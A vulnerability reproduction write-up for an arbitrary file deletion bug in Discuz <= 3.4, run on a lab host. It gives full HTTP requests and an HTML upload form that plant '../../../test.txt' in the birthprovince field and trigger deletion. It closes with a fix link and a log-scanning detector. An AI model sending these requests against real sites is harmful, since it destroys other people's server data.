Preface: On September 29, Discuz fixed a front-end (non-admin) arbitrary file deletion vulnerability. A similar vulnerability had been reported to WooYun and to Discuz in 2014, but the incomplete fix led to this one. Many posts online say the official 3.4 release is already fixed, but the environment I am using is the 3.4 version from vulhub, so rather than guess whether 3.4 is fixed or not, I simply reproduce it.
Affected versions: Discuz <= 3.4
Environment
Reproduction: First, create a file test.txt in the discuz directory; this is the file we will delete later.
Creating test.txt
Visit http://192.168.220.131/home.php?mod=spacecp, then open Inspect Element, find the value of formhash, and copy it.
Viewing formhash
Use Burp to capture the request and obtain the cookie.
Captured cookie
Send the following request, substituting your own cookie, formhash, and the file to delete:
POST /home.php?mod=spacecp&ac=profile&op=base HTTP/1.1
Host: localhost
Content-Length: 367
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryPFvXyxL45f34L12s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: CmcL_2132_saltkey=b9yKqToA; CmcL_2132_lastvisit=1577934646; CmcL_2132_sid=I21Fam; CmcL_2132_lastact=1577951222%09misc.php%09patch; CmcL_2132__refer=%252Fhome.php%253Fmod%253Dspacecp; CmcL_2132_seccode=1.1f5dbc9f8f51267031; CmcL_2132_ulastactivity=f7c74D32skNeZM0YcFOOaQUi7XmBcai6jjji8MGC7px2%2BTiSN9qM; CmcL_2132_auth=8bf5qD72m1LL4vx%2BXQAGHjNEfio4ELQqrhkkrwz%2FdcuiSxXlRhnYfpwxloZj5lqVp6zUrThf%2FVYOcWS9xQwm; CmcL_2132_lastcheckfeed=2%7C1577938266; CmcL_2132_lip=192.168.220.1%2C1577938056
Connection: close

------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="formhash"

84a7f376
------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="birthprovince"

../../../test.txt
------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="profilesubmit"

1
------WebKitFormBoundaryPFvXyxL45f34L12s--
Sending the request
Refresh the page; the birthplace field will now show the state in the figure below:
Data written successfully
This shows the value has been stored in the database:
Next, create an upload.html with the code below; change the IP to your Discuz host and [form-hash] to your formhash:
<form action="http://192.168.220.131/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa" method="POST" enctype="multipart/form-data">
<input type="file" name="birthprovince" id="file" />
<p><input type="text" name="formhash" value="84a7f376" /></p>
<p><input type="text" name="profilesubmit" value="1" /></p>
<input type="submit" value="Submit" />
</form>
Or construct the request directly:
POST /home.php?mod=spacecp&ac=profile&op=base&profilesubmit=1&formhash=84a7f376 HTTP/1.1
Host: 192.168.220.131
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------123821742118716
Content-Length: 91989
Connection: close
Cookie: CmcL_2132_saltkey=b9yKqToA; CmcL_2132_lastvisit=1577934646; CmcL_2132_sid=I21Fam; CmcL_2132_lastact=1577951222%09misc.php%09patch; CmcL_2132__refer=%252Fhome.php%253Fmod%253Dspacecp; CmcL_2132_seccode=1.1f5dbc9f8f51267031; CmcL_2132_ulastactivity=f7c74D32skNeZM0YcFOOaQUi7XmBcai6jjji8MGC7px2%2BTiSN9qM; CmcL_2132_auth=8bf5qD72m1LL4vx%2BXQAGHjNEfio4ELQqrhkkrwz%2FdcuiSxXlRhnYfpwxloZj5lqVp6zUrThf%2FVYOcWS9xQwm; CmcL_2132_lastcheckfeed=2%7C1577938266; CmcL_2132_lip=192.168.220.1%2C1577938056
Upgrade-Insecure-Requests: 1

-----------------------------123821742118716
Content-Disposition: form-data; name="birthprovince"; filename="0.jpg"
Content-Type: image/jpeg

zerba (anything can go here)
-----------------------------123821742118716--
Check the Discuz directory: test.txt has been deleted.
Fix recommendation: https://gitee.com/ComsenzDiscuz/DiscuzX/commit/7d603a197c2717ef1d7e9ba654cf72aa42d3e574
Edit upload/source/include/spacecp/spacecp_profile.php and remove the unlink-related code.
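As a defender-side complement to the fix above, the following added example (not from the original post and not Discuz's own code) scans combined-format access-log lines for the deletefile[...] query parameter and path-traversal values used in this write-up; the log lines, timestamps and client addresses are constructed.

```python
"""Flag Discuz spacecp profile requests that carry a deletefile[...] query
parameter or a path-traversal value, read from combined-format access logs.
Added example for this write-up; SAMPLE_LOG below is constructed, not real."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

SAMPLE_LOG = """\
192.168.220.1 - - [02/Jan/2020:10:01:02 +0800] "GET /home.php?mod=spacecp HTTP/1.1" 200 5120
192.168.220.1 - - [02/Jan/2020:10:02:15 +0800] "POST /home.php?mod=spacecp&ac=profile&op=base HTTP/1.1" 200 311
192.168.220.1 - - [02/Jan/2020:10:03:40 +0800] "POST /home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa HTTP/1.1" 200 311
10.0.0.7 - - [02/Jan/2020:10:05:09 +0800] "GET /home.php?mod=spacecp&ac=profile&op=base&deletefile%5Bbirthprovince%5D=..%2F..%2F..%2Ftest.txt HTTP/1.1" 200 311
"""

def classify_request(target):
    """Return the reasons a request target matches the pattern ([] if none).
    Only the query string is visible here: the profile submit that plants
    '../../../test.txt' travels in the POST body and needs body logging or a WAF."""
    parts = urlsplit(target)
    if not parts.path.endswith("/home.php"):
        return []
    qs = parse_qs(parts.query, keep_blank_values=True)  # decodes %5B -> [
    if qs.get("mod") != ["spacecp"] or qs.get("ac") != ["profile"]:
        return []
    reasons = []
    for key, values in qs.items():
        if key.startswith("deletefile["):
            reasons.append(f"deletefile parameter: {key}")
        for value in values:
            if ".." in unquote(value):  # second unquote catches double encoding
                reasons.append(f"path traversal in {key}: {unquote(value)}")
    return reasons

def scan_log(text):
    """Run classify_request over every parseable log line; return the hits."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _when, _method, target, _status = m.groups()
        reasons = classify_request(target)
        if reasons:
            hits.append({"line": lineno, "client": client, "reasons": reasons})
    return hits

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```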